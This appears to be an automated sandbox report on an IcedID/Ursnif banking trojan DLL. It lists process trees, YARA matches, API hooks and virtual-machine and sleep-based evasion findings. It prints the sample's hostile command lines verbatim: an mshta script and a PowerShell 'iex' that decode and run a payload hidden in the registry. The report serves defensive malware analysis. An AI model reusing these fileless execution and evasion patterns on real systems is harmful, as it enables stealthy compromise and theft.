Source: C:\Windows\System32\control.exe Code function: 37_2_00500294 37_2_00500294
Source: C:\Windows\System32\control.exe Code function: 37_2_004E2B40 37_2_004E2B40
Source: C:\Windows\System32\control.exe Code function: 37_2_004F0304 37_2_004F0304
Source: C:\Windows\System32\control.exe Code function: 37_2_005053D4 37_2_005053D4
Source: C:\Windows\System32\control.exe Code function: 37_2_00502BD8 37_2_00502BD8
Source: C:\Windows\System32\control.exe Code function: 37_2_004EEBD0 37_2_004EEBD0
Source: C:\Windows\System32\control.exe Code function: 37_2_004F3BF4 37_2_004F3BF4
Source: C:\Windows\System32\control.exe Code function: 37_2_004EC458 37_2_004EC458
Source: C:\Windows\System32\control.exe Code function: 37_2_00501C68 37_2_00501C68
Source: C:\Windows\System32\control.exe Code function: 37_2_0050D468 37_2_0050D468
Source: C:\Windows\System32\control.exe Code function: 37_2_00509C04 37_2_00509C04
Source: C:\Windows\System32\control.exe Code function: 37_2_004F3438 37_2_004F3438
Source: C:\Windows\System32\control.exe Code function: 37_2_004F44FC 37_2_004F44FC
Source: C:\Windows\System32\control.exe Code function: 37_2_004EDC88 37_2_004EDC88
Source: C:\Windows\System32\control.exe Code function: 37_2_004E74A8 37_2_004E74A8
Source: C:\Windows\System32\control.exe Code function: 37_2_00500D40 37_2_00500D40
Source: C:\Windows\System32\control.exe Code function: 37_2_0050ED7C 37_2_0050ED7C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F7500 37_2_004F7500
Source: C:\Windows\System32\control.exe Code function: 37_2_004E9514 37_2_004E9514
Source: C:\Windows\System32\control.exe Code function: 37_2_004F1D14 37_2_004F1D14
Source: C:\Windows\System32\control.exe Code function: 37_2_004E1D20 37_2_004E1D20
Source: C:\Windows\System32\control.exe Code function: 37_2_00507DDC 37_2_00507DDC
Source: C:\Windows\System32\control.exe Code function: 37_2_004E559C 37_2_004E559C
Source: C:\Windows\System32\control.exe Code function: 37_2_005075B4 37_2_005075B4
Source: C:\Windows\System32\control.exe Code function: 37_2_005015A0 37_2_005015A0
Source: C:\Windows\System32\control.exe Code function: 37_2_004FBE9C 37_2_004FBE9C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F4F5C 37_2_004F4F5C
Source: C:\Windows\System32\control.exe Code function: 37_2_004FEF7C 37_2_004FEF7C
Source: C:\Windows\System32\control.exe Code function: 37_2_004F2F1C 37_2_004F2F1C
Source: C:\Windows\System32\control.exe Code function: 37_2_0050EFD0 37_2_0050EFD0
Source: C:\Windows\System32\control.exe Code function: 37_2_004F97C8 37_2_004F97C8
Source: C:\Windows\System32\control.exe Code function: 37_2_004E3F98 37_2_004E3F98
Found potential string decryption / allocating functions
Source: C:\Windows\System32\loaddll32.exe Code function: String function: 6E4E4394 appears 49 times
PE file does not import any functions
Source: vkjmiujf.dll.34.dr Static PE information: No import functions for PE file found
Source: vy454zdn.dll.32.dr Static PE information: No import functions for PE file found
Sample file is different than original file name gathered from version info
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Binary or memory string: OriginalFilenameMetal.dllH vs SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Searches for the Microsoft Outlook file path
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXE Jump to behavior
Tries to load missing DLLs
Source: C:\Windows\System32\mshta.exe Section loaded: onecoreuapcommonproxystub.dll Jump to behavior
Uses 32bit PE files
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL
Yara signature match
Source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY Matched rule: GoziRule author = CCN-CERT, description = Win32.Gozi, version = 1.0, ref = https://www.ccn-cert.cni.es/informes/informes-ccn-cert-publicos.html
Source: classification engine Classification label: mal100.bank.troj.evad.winDLL@24/32@16/1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E31DD CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 1_2_032E31DD
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Microsoft\Internet Explorer\Recovery\High Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6964:120:WilError_01
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Mutant created: \Sessions\1\BaseNamedObjects\{F6D1E166-DDA0-982C-178A-614C3B5E2540}
Source: C:\Windows\System32\control.exe Mutant created: \Sessions\1\BaseNamedObjects\{CA11A837-A156-8C7F-7B9E-6580DFB269B4}
Source: C:\Windows\SysWOW64\rundll32.exe Mutant created: \Sessions\1\BaseNamedObjects\{56444DC9-BDAF-F82D-F7EA-41AC1BBE05A0}
Source: C:\Program Files\internet explorer\iexplore.exe File created: C:\Users\user\AppData\Local\Temp\~DF267A83FE4CD46439.TMP Jump to behavior
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\ac26e2af62f23e37e645b5e44068a025\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorlib.dll
Source: C:\Program Files\internet explorer\iexplore.exe File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Windows\System32\loaddll32.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Virustotal: Detection: 21%
Source: rundll32.exe String found in binary or memory: EmailAddressCollection/EmailAddress[%u]/Address
Source: unknown Process created: C:\Windows\System32\loaddll32.exe loaddll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll'
Source: unknown Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1
Source: unknown Process created: C:\Program Files\internet explorer\iexplore.exe 'C:\Program Files\Internet Explorer\iexplore.exe' -Embedding
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2
Source: unknown Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2
Source: unknown Process created: C:\Windows\System32\mshta.exe 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>resizeTo(1,1);eval(new ActiveXObject('WScript.Shell').regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\Actidsrv'));if(!window.flag)close()</script>'
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: unknown Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Source: unknown Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h
Source: C:\Windows\System32\loaddll32.exe Process created: C:\Windows\SysWOW64\rundll32.exe rundll32.exe 'C:\Users\user\Desktop\SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll',#1 Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process created: C:\Windows\System32\control.exe C:\Windows\system32\control.exe -h Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17410 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:82952 /prefetch:2 Jump to behavior
Source: C:\Program Files\internet explorer\iexplore.exe Process created: C:\Program Files (x86)\Internet Explorer\iexplore.exe 'C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE' SCODEF:1260 CREDAT:17430 /prefetch:2 Jump to behavior
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES1E30.tmp' 'c:\Users\user\AppData\Local\Temp\vy454zdn\CSCE57ED4738764ED181FB6CF8C395867D.TMP'
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RES310C.tmp' 'c:\Users\user\AppData\Local\Temp\vkjmiujf\CSC5E84712ED974B8AAC9F3D817F74BE40.TMP'
Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11cf-8FD0-00AA00686F13}\InProcServer32 Jump to behavior
Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll Jump to behavior
Source: C:\Program Files (x86)\Internet Explorer\iexplore.exe File opened: C:\Program Files (x86)\Java\jre1.8.0_211\bin\msvcr100.dll Jump to behavior
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: partial method>An expression tree may not contain an unsafe pointer operationAAn expression tree may not contain an anonymous method expressionHAn anonymous method expression cannot be converted to an expression tree@Range variable '%1!ls!' cannot be assigned to -- it is read onlyPThe range variable '%1!ls!' cannot have the same name as a method type parameterKThe contextual keyword 'var' cannot be used in a range variable declarationaThe best overloaded Add method '%1!ls!' for the collection initializer has some invalid argumentsAAn expression tree lambda may not contain an out or ref parameterJAn expression tree lambda may not contain a method with variable argumentsSSpecify debug information file name (default: output file name with .pdb extension)$Specify a Win32 manifest file (.xml))Do not include the default Win32 manifestNSpecify an application configuration file containing assembly binding settings8Output line and column of the end location of each errorFBuild a Windows Runtime intermediate file that is consumed by WinMDExp Build an Appcontainer executable+Specify the preferred output language name.3Could not write to output file '%2!ls!' -- '%1!ls!' source: csc.exe, 00000020.00000002.440174527.0000025637660000.00000002.00000001.sdmp, csc.exe, 00000022.00000002.449830180.000002835CB50000.00000002.00000001.sdmp
Source: Binary string: wscui.pdbUGP source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: Binary string: ntdll.pdb source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: c:\FatSchool\syllableLetter\HuntMouth\ResultMount\Metal.pdb source: loaddll32.exe, 00000000.00000002.474041669.000000006E4F4000.00000002.00020000.sdmp, SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll
Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000001.00000003.464838911.0000000006880000.00000004.00000001.sdmp
Source: Binary string: rundll32.pdb source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: rundll32.pdbGCTL source: control.exe, 00000025.00000002.475364095.00000234DE54C000.00000004.00000040.sdmp
Source: Binary string: wscui.pdb source: explorer.exe, 00000024.00000000.480563169.0000000006560000.00000002.00000001.sdmp
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: SecuriteInfo.com.BScope.TrojanBanker.IcedID.dll Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

Suspicious powershell command line found
Source: unknown Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi))
Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').basebapi)) Jump to behavior
Compiles C# or VB.Net code
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline'
Source: unknown Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.cmdline' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.cmdline' Jump to behavior
Contains functionality to dynamically determine API calls
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602556E LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress, 1_2_0602556E
Uses code obfuscation techniques (call, push, ret)
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D2140 push ecx; ret 0_2_6E4D2149
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D6A2E push ecx; retf 0_2_6E4D6A3B
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D6798 push 3AC03203h; ret 0_2_6E4D679D
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4D2193 push ecx; ret 0_2_6E4D21A3
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E4E43D9 push ecx; ret 0_2_6E4E43EC
Source: C:\Windows\System32\loaddll32.exe Code function: 0_2_6E51321D push esi; ret 0_2_6E513224
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EAF23 push ecx; ret 1_2_032EAF33
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032EABF0 push ecx; ret 1_2_032EABF9
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602769F push ecx; ret 1_2_060276AF
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602D6FD push es; iretd 1_2_0602D704
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602BA6C push es; ret 1_2_0602BA6D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602BA7E push eax; ret 1_2_0602BA81
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06027330 push ecx; ret 1_2_06027339
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0602D3E4 push es; iretd 1_2_0602D3EC
Source: C:\Windows\System32\control.exe Code function: 37_2_004EC115 push 3B000001h; retf 37_2_004EC11A
Source: C:\Windows\System32\control.exe Code function: 37_2_00521685 push es; iretd 37_2_0052168C
Source: C:\Windows\System32\control.exe Code function: 37_2_0052136C push es; iretd 37_2_00521374

Persistence and Installation Behavior:

Drops PE files
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.dll Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

Yara detected Ursnif
Source: Yara match File source: 00000024.00000000.479277351.00000000062EE000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387854313.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387825227.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.483192314.0000000006000000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.394470622.0000000005C1B000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 0000001C.00000003.454320398.00000221ED090000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387917414.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000002.470708873.000000000051E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387785430.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387944110.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.457563065.0000000003350000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000025.00000003.466656010.00000234DC590000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387897096.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387985412.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.387963889.0000000005D98000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: rundll32.exe PID: 4880, type: MEMORY
Source: Yara match File source: Process Memory Space: control.exe PID: 3412, type: MEMORY
Source: Yara match File source: Process Memory Space: powershell.exe PID: 3888, type: MEMORY
Source: Yara match File source: Process Memory Space: explorer.exe PID: 3388, type: MEMORY
Hooks registry keys query functions (used to hide registry keys)
Source: explorer.exe IAT, EAT, inline or SSDT hook detected: function: api-ms-win-core-registry-l1-1-0.dll:RegGetValueW
Modifies the export address table of user mode modules (user mode EAT hooks)
Source: explorer.exe IAT of a user mode module has changed: module: KERNEL32.DLL function: CreateProcessAsUserW address: 7FFB70FF521C
Modifies the import address table of user mode modules (user mode IAT hooks)
Source: explorer.exe EAT of a user mode module has changed: module: user32.dll function: api-ms-win-core-processthreads-l1-1-0.dll:CreateProcessW address: 7FFB70FF5200
Modifies the prolog of user mode functions (user mode inline hooks)
Source: explorer.exe User mode code has changed: module: KERNEL32.DLL function: CreateProcessAsUserW new code: 0xFF 0xF2 0x25 0x50 0x00 0x00
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\SysWOW64\rundll32.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\SysWOW64\rundll32.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion:

Contains capabilities to detect virtual machines
Source: C:\Windows\System32\mshta.exe File opened / queried: SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b} Jump to behavior
Contains long sleeps (>= 3 min)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2591 Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6077 Jump to behavior
Found dropped PE file which has not been started or loaded
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vkjmiujf\vkjmiujf.dll Jump to dropped file
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\vy454zdn\vy454zdn.dll Jump to dropped file
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2336 Thread sleep time: -9223372036854770s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\SysWOW64\rundll32.exe Last function: Thread delayed
Source: C:\Windows\System32\control.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_032E3512 Wow64EnableWow64FsRedirection,RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_032E3512
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06004CF1 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary, 1_2_06004CF1
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_06015518 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose, 1_2_06015518
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600834C RtlAllocateHeap,RtlAllocateHeap,RtlAllocateHeap,memset,CreateFileA,GetFileTime,CloseHandle,StrRChrA,lstrcat,FindFirstFileA,FindFirstFileA,CompareFileTime,CompareFileTime,FindClose,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,StrChrA,memcpy,FindNextFileA,FindClose,FindFirstFileA,CompareFileTime,FindClose,HeapFree,HeapFree, 1_2_0600834C
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_0600B88D lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError, 1_2_0600B88D
Source: C:\Windows\SysWOW64\rundll32.exe Code function: 1_2_060016E1 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree, 1_2_060016E1
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 00000024.00000000.485204567.000000000871F000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000:
Source: explorer.exe, 00000024.00000000.484371056.0000000008220000.00000002.00000001.sdmp Binary or memory string: A Virtual Machine could not be started because Hyper-V is not installed.
Source: explorer.exe, 00000024.00000000.484653119.0000000008640000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
